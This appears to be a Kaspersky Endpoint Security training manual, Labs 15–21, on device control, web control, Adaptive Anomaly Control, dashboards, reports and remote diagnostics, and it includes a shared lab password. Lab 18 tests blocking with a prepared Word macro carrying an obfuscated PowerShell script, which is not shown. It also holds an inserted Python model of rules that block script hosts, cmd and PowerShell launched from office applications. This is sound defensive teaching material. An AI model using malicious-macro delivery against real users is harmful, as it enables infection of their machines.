This lab demonstrates how the administrators, by properly configuring the product, can block the start of new and unknown files on the endpoints. By doing so, they will reduce the risk of infection on the protected machines.

KL 002.11.6: Lab 15.
Kaspersky Endpoint Security and Management How to block USB flash drives

Scenario. Incident analysis has revealed that a number of computers had become infected through USB flash drives. The decision was made to eliminate this penetration vector. Your task is to block access to all USB flash drives using Kaspersky Endpoint Security on all workstations in the ABC network.

Contents. In this lab, we will:
Configure blocking USB flash drives
Test blocking USB flash drives
Receive the request from the user

In this task, we will learn how to configure blocking USB flash drives in the policy.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

Start the task on Tom-Laptop.

Log on to the abc\Tom account. Password—Ka5per5Ky
From desktop, click vhui64. Expand USB Hubs and then expand Desktop Hub.
Right-click KL_EDU and select Use this device.
On the Tom-Laptop computer, click Start, Computer
Make sure that the USB flash drive has been connected successfully

Switch to the KSC computer

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application settings tab
Select the Security Controls section
Select the Device Control component
Click the link Access rules for devices and Wi-Fi networks

Click the link Removable drives
Note that access to devices Depends on connection bus
Under Access, select Block
Click OK
Make sure that access to Removable drives is set to Block
Click OK
Click Save to save the policy
Wait for the policy to be applied

In this task, we will try to access the device already connected to the computer.

The task is performed on Tom-Laptop.

Log on to the abc\Tom account. Password—Ka5per5Ky
Note that the USB flash drive is still shown among Devices and drives
Open the USB flash drive
Note that despite the fact that the removable drive is visible, it is inaccessible
Close the Windows message
Click Request access
Read the message
Click Send

In this task, we will receive the USB drive access request from the user.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Event Selections
Click User requests
Read the request

In this lab, we studied how to block access to removable drives. Aside from blocking access completely, you can
also allow access upon request or allow specific devices only. Typically, administrators will use this functionality
to block the spread of malware through removable drives on the network. This feature can also help to prevent
data leakage.
KL 002.11.6: Lab 16.
Kaspersky Endpoint Security and Management How to configure granular permissions for USB flash drives

Scenario. You have prohibited access to USB flash drives throughout the company. However, the measure turned out to be too aggressive, as some users need USB flash drives for work-related tasks. The decision to allow all users to use encrypted USB flash drives has been made at the company.

Now, we will allow the users to read and copy files from USB flash drives; add encrypted USB flash drives
to trusted devices and thus allow domain users to access them without limitations; and also configure
logging operations with these USB flash drives.

Contents. In this lab, we will:
Prohibit all users from writing files to USB flash drives
Allow the domain users to write files to trusted USB flash drives

Open the Device Control settings in the Kaspersky Endpoint Security policy. Enable the users (Everyone) to
read files from removable drives.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

Start the task on Tom-Laptop.

Log on to the abc\Tom account. Password—Ka5per5Ky
From desktop, click vhui64. Expand USB Hubs and expand Desktop Hub.
Right-click KL_EDU and select Use this device.
Click Start, Computer
Make sure that the USB flash drive has been connected successfully

Switch to the KSC computer

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application settings tab
Select the Security Controls section
Select the Device Control component
Click the link Access rules for devices and Wi-Fi networks

Click the link Removable drives
Note that access to removable drives is set to Block
Prohibit the users from writing to removable drives: Clear the Write checkbox and click OK
Save the policy and wait for it to be enforced
Open the USB flash drive
Copy any file from the flash drive to the desktop
Try to copy a file from the desktop to the USB flash drive
Make sure that Kaspersky Endpoint Security does not permit copying to the flash drive

Close the Windows message

Open the Device Control settings in the Kaspersky Endpoint Security policy. Make the removable drive trusted
for the Domain users group. Select to log events when users write files to USB flash drives.

Start the task on the KSC machine.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application settings tab
Select the Security Controls section
Select the Device Control component

Click the link Access rules for devices and Wi-Fi networks
Click the link Removable drives
Open the Logging tab
ENABLE Logging
Click the Add button at the bottom of the window to specify a user group

Type everyone and click the magnifying glass icon
Choose the Everyone group
Click Select
Click OK
Click the link Trusted devices
Make the removable drive trusted: click Add device by ID

On the list of devices, select Generic Flash Disk USB Device
Click Next
Select the Domain Users group
Click Next
Click OK
Make sure that the device has become trusted for the Domain Users group
Click OK

Switch to the Application settings tab
Go to the General settings section
Click Interface
In the Notifications area, click the Notification settings link
Select the Device Control component
Select to Save in local report the File operation performed event and click OK
Click Save to save the policy
Wait for the policy to be applied
Switch to Tom-Laptop.

Copy the invoice.txt file from the desktop to the USB flash drive
Make sure that Kaspersky Endpoint Security allows you to write files to a trusted device

Switch to the KSC computer

Open Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Reports
Click Report on file operations on removable drives
Switch to the Details tab
Make sure that the report informs that the ABC\Tom user saved the invoice.txt file to a removable drive

In this lab, we studied how to control user access rights to USB flash drives along with making exclusions for
specific drive types. There are always users at a company (secretaries, for example) who need to copy data
to/from various USB flash drives whose model and serial number are usually not known in advance.

Others (like administrators, for example) typically have this information readily available. You can configure
exclusions for these drives. The policy provides for flexible adjustments: You can create a list of specific USB
flash drives that are to be accessible and specify users and/or groups who use them.

KL 002.11.6: Lab 17.
Kaspersky Endpoint Security and Management How to configure web access control

Scenario. When analyzing the company’s internet traffic, you have found that many users visit cryptocurrency exchange websites during business hours. Based on this information, you would like to prohibit that by setting up a policy to specifically block access to the respective content category.

Contents. In this lab, we will:
Create a rule to block access to cryptocurrency exchange websites
Test whether access to cryptocurrency exchange websites is blocked
Consult reports in Kaspersky Security Center

In this task, we will configure the policy to block access to cryptocurrency exchange websites for all users
during business hours.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
Go to Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows
Switch to the Application settings tab
Select the Security Controls section
Select the Web Control component

Click Add
In the Rule name box, type Cryptocurrencies
For the Action, select Block
Select the checkbox By content categories
Click the link Content categories
On the Content Categories list, under Online stores, banks, payment systems, select Cryptocurrencies, mining
Click OK

Select Apply to individual users and / or groups
Click Add
In the search box, type everyone
Choose the respective group
Click Select

Make sure that the Cryptocurrencies blocking rule has been created
Click OK
Click Save to save the policy
Wait for the policy to be applied

In this task, we will make sure that the rule has been applied and the Cryptocurrencies and mining category
is blocked.

The task is performed on Tom-Laptop.

Log on to the abc\Tom account. Password—Ka5per5Ky
Start Internet Explorer
Go to www.coinmarketcap.com
Make sure that the rule blocks access to cryptocurrency exchange websites
Close the Internet Explorer window

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Event Selections
Click Recent events
Open the last event from Tom-Laptop
Note that Web Control blocked access to website www.coinmarketcap.com

In this lab, we studied the functionality that blocks access to web resources. Access can be allowed or blocked by content category, data type or both. Access can be blocked during a specified time period only and be applied to user groups or specific users. A typical use example for this functionality is blocking access to social networks, executable files or external email, through which information may leak and/or infected objects can be downloaded.

KL 002.11.6: Lab 18.
Kaspersky Endpoint Security and Management How to configure Adaptive Anomaly Control

Scenario. Kaspersky Endpoint Security features a component that monitors scripts and macros and detects system anomalies. You have decided to test the health of this protection component. For this purpose, you will use a Word file with a macro that contains an obfuscated PowerShell script prepared beforehand.

Contents. In this lab, we will:
Configure blocking macros and scripts in office documents
Make sure that Adaptive Anomaly Control blocks a malicious macro

Disable all main protection components. By default, the Adaptive Anomaly Control protection component works in
the statistics mode at first and collects data about started programs and scripts. To test how the component
detects malicious files, switch it to the block mode manually.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
Select Security Controls
Open the settings of the Adaptive Anomaly Control component
Enable Adaptive Anomaly Control
Click the Rules link to configure detection rules
Expand the list of rules Activity of office applications
Switch the rules to the block mode: Change the action from Smart to Block for the following rules:
— Start of Microsoft Console Based Script Host from office application
— Start of Microsoft Windows Based Script Host from office application
— Start of Microsoft Windows Command Processor from office application
— Start of Microsoft PowerShell from office application
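To see what these four rules amount to, here is an added Python model (not Kaspersky code; the image names behind each rule, the set of office applications and the sample process-start events are assumptions, since the page only names the rules and the Smart/Block actions) that evaluates constructed process-start events against the rules in Smart mode and in Block mode.

```python
"""Model of the four Adaptive Anomaly Control rules switched to Block in Lab 18.

Added example, not Kaspersky code. The image names behind each rule, the
"office applications" set and the sample process-start events are
constructed assumptions; the product's own matching logic is not shown on
the page.
"""
from dataclasses import dataclass

# Assumed parents covered by the "Activity of office applications" group.
OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}

# Rule name exactly as listed in the policy -> child images it covers (assumed).
RULES = {
    "Start of Microsoft Console Based Script Host from office application": {"CSCRIPT.EXE"},
    "Start of Microsoft Windows Based Script Host from office application": {"WSCRIPT.EXE"},
    "Start of Microsoft Windows Command Processor from office application": {"CMD.EXE"},
    "Start of Microsoft PowerShell from office application": {"POWERSHELL.EXE"},
}


@dataclass(frozen=True)
class ProcessStart:
    parent: str   # image name of the process that spawned the child
    child: str    # image name being started
    user: str


def match_rule(event):
    """Return the name of the rule that covers this start, or None."""
    if event.parent.upper() not in OFFICE_APPS:
        return None
    child = event.child.upper()
    for name, children in RULES.items():
        if child in children:
            return name
    return None


def decide(event, actions):
    """Apply the per-rule action; returns (decision, rule name or None).

    Smart: the rule is still in statistics (training) mode, as the lab
           describes for a fresh installation, so the start is only recorded.
    Block: the start is prevented and a "blocked action" event is raised.
    """
    rule = match_rule(event)
    if rule is None:
        return "allow", None
    if actions.get(rule, "Smart") == "Block":
        return "block", rule
    return "record", rule


def lab18_actions():
    """After the lab: all four office-application rules switched to Block."""
    return {name: "Block" for name in RULES}


def default_actions():
    """Before the lab: the rules keep their default Smart action."""
    return {name: "Smart" for name in RULES}


# Constructed events. The first one is the lab's test case: Tom enables the
# macro in "Weekly report (ps).doc" and Word starts PowerShell. The others
# show a second covered child, an uncovered child and an uncovered parent.
SAMPLE_EVENTS = [
    ProcessStart("WINWORD.EXE", "powershell.exe", "abc\\Tom"),
    ProcessStart("EXCEL.EXE", "cmd.exe", "abc\\Tom"),
    ProcessStart("WINWORD.EXE", "notepad.exe", "abc\\Tom"),
    ProcessStart("explorer.exe", "powershell.exe", "abc\\Tom"),
]


def run(events, actions):
    """Evaluate every event; returns [(parent, child, decision), ...]."""
    return [(e.parent, e.child, decide(e, actions)[0]) for e in events]


if __name__ == "__main__":
    for row in run(SAMPLE_EVENTS, lab18_actions()):
        print(*row)   # WINWORD.EXE powershell.exe block, EXCEL.EXE cmd.exe block, ...
```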

Save the policy: Click OK and Save
Confirm that you want to use the specified settings: Click Yes
Wait for the policy to be enforced

Send a message with an attachment that contains a malicious script and make sure that the file will be blocked.

Start the task on the Alex-Desktop machine.

Run Microsoft Outlook
Create a new message:
— Specify the addressee. In the To box, type tom@abc.lab
— In the Subject box, type Weekly report
— Attach the Weekly report (ps).doc file located in Z:\LabFiles\Lab18
Click Send to dispatch the message

Switch to Tom-Laptop.

Run Microsoft Outlook
Open the Weekly report (ps).doc attachment
In the Microsoft Word window, click Enable Content
Make sure that a message informing about prohibited PowerShell.exe start has appeared
Click OK
Make sure that it was Kaspersky Endpoint Security that blocked the action
Open the application report
Select Adaptive Anomaly Control
Find and read the event about a blocked action
Close the Microsoft Word window

In this lab, we have studied the Adaptive Anomaly Control component. It can either notify the administrator about a script run or abnormal program behavior, or block a process, macro or PowerShell.

KL 002.11.6: Lab 19.
Kaspersky Endpoint Security and Management How to configure the dashboard

Scenario. In your daily routine, you open the Kaspersky Security Center management console to monitor if protection is in place and check if there are some threats or issues that require your attention. To have a quick protection status overview, configure the dashboard to summarize the health of your systems.

Contents. In this lab, you will configure the dashboard for daily monitoring.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open the Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Dashboard
Note that Kaspersky Security Center Web Console has a few preset widgets
To create a new widget, click Add or restore web widget

Expand Update and select Distribution of anti-virus databases
Click Add
A new widget has been added to the page
Click Add or restore web widget

Expand Threat statistics and select History of network attacks
Click Add
To edit the widget's representation, click its gear icon
Select Chart type: Lines

The widget's representation has changed

Delete unnecessary widgets and rearrange the others on the dashboard.

The task is performed on KSC.

In the New devices widget, click the gear icon and select Hide web widget

Click OK to confirm
Note that the widgets have moved to close the gap
On the Most frequent threats widget, click the gear icon and select Move
Click the Threat activity widget that currently occupies the place you want to move the Most frequent threats widget to
The Most frequent threats widget has been relocated

You have added the widgets that you need to the dashboard, which shows the most important information
about network protection.

KL 002.11.6: Lab 20.
Kaspersky Endpoint Security and Management How to configure maintenance tools

Scenario. To be able to find the necessary information and react to threats more quickly, delete the reports that you do not use, prepare a virus scan task that can be started from computers' shortcut menus, and configure weekly reports to be emailed to you.

Contents. In this lab, we will:
– Delete unused reports
– Create a report about computers infected over the previous week
– Configure the most important reports to be emailed

Delete all reports except for:
– Kaspersky software version report
– Threats report
– Report on prohibited applications
– Most infected computers report
– Report on users of infected devices
– Web control report
– Protection deployment report
– Network attack report
– Protection status report
– Report on file operations on removable drives
– Key usage report
– Anti-virus database usage report

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
Go to Monitoring & Reporting | Reports
Select Report on errors
Click Delete

Confirm that you want to delete the report: Click OK

Delete the following reports in a similar manner (the Kaspersky software version report is on the list of reports to keep and is not deleted):
— Hardware report
— Report on incompatible applications
— Report on file encryption errors
— Report on blockage of access to encrypted files
— Report on device users
— Report on effective user permissions
— Report on encryption status of mass storage devices
— Report on hardware registry
— Report on key usage by virtual Administration Server
— Report on rights
— Report on rights about access to encrypted devices
— Report on test blocked runs
— Software updates report
— Vulnerabilities report
— Report on attacked controllers
— Report on check of programmable logic controllers (PLCs) for integrity
— Report on results of update installation of third-party software

Rename the Report on most heavily infected devices to Monthly report on most heavily infected devices;
then create a weekly report.

The task is performed on KSC.

Open the properties of the Report on most heavily infected devices
Rename it to Monthly report on most heavily infected devices and click Save
Close the report window
Create a new report: Click the Add button

Name the report Weekly report on most heavily infected devices
Expand Threat statistics and select Report on most heavily infected devices
Click Next
Select Administration group and specify Managed devices
Click Next
Set the reporting period to 7 days and click OK
In the window that opens, click Save

Configure the following reports to be emailed weekly on Mondays at 10am:
— Protection status report
— Anti-virus database usage report
— Weekly report on most heavily infected devices
— Network attack report

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Tasks
Create a report sending task: Click Add
Select Kaspersky Security Center 13 on the list of applications
Select the Deliver reports task type
Name the task Deliver reports
Click Next
Select the following reports:
— Protection status report
— Weekly report on most heavily infected devices
— Network attack report
— Anti-virus database usage report

Specify the delivery method: Send reports by email
Click Settings
In the Email address field, type administrator@abc.lab
Click OK
Click Next

Click Next
Clear the checkbox Open task details when creation is complete
Click Finish
Click the Deliver reports link
Switch to the Schedule tab
Set the emailing interval to Weekly
Select Monday and 10am, then click Save

You have deleted unused reports, and you will now be able to find the necessary ones more quickly.
KL 002.11.6: Lab 21.
Kaspersky Endpoint Security and Management How to collect diagnostic information

Scenario. Kaspersky Endpoint Security components will not start on a corporate computer, and you have not been able to determine the cause. Collect Kaspersky Endpoint Security trace logs to send to technical support. Do it remotely from the Administration Console.

Contents. In this lab, you will remotely collect trace logs from a computer.

Find the Alex-Desktop computer in the console and start the remote diagnostics utility from its shortcut menu.
In the utility window, enable tracing for Kaspersky Endpoint Security, restart Kaspersky Endpoint Security and
download the logs. Additionally, download information about the computer and Windows logs: Kaspersky Event
Log and System.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Log on to the abc\Administrator account with the password Ka5per5Ky
Run the MMC Administration Console
Go to the Managed devices node
To find the Alex-Desktop computer, run the search utility from the shortcut menu of the Managed devices node

Type Alex-Desktop and click Find now
Make sure that the Alex-Desktop computer has appeared in the search results
Run the remote diagnostics utility: On the computer's shortcut menu, select Custom tools | Remote diagnostics
Make sure that the Device box contains the name of the Alex-Desktop computer
Connect the utility to the computer: Click Sign in

Enable tracing: Select Kaspersky Endpoint Security for Windows
Click the link Enable tracing
Leave Tracing Level 500
Select Rotation-based tracing
Set the Files count to 2
Specify the Maximum file size: 20MB
Click OK

Restart Kaspersky Endpoint Security: click the link Restart application
Wait for Kaspersky Endpoint Security to restart. At the bottom of the window, the following message will appear: Operation completed successfully
Click the link Disable tracing
Expand the Kaspersky Endpoint Security for Windows/Trace files folder
Select the first file on the list and click the link Download entire file
Download the other files from the Trace files folder in a similar manner

Download information about the computer: Select the System Info node
Click the link Download System Info
Open the Event log folder and save the Kaspersky Event Log and System log in a similar manner
Click the link Download folder in the lower-left corner of the window
Make sure that the folder contains all the necessary logs
Close the diagnostics utility
Do not delete the folder with logs: Click No

You have downloaded Kaspersky Endpoint Security trace logs and system information from the computer.
Attach these logs to your technical support request.

You can also use the diagnostics utility if you need Network Agent logs, update module logs, installation logs, or tracing for the Administration Server.

v.1.6.6
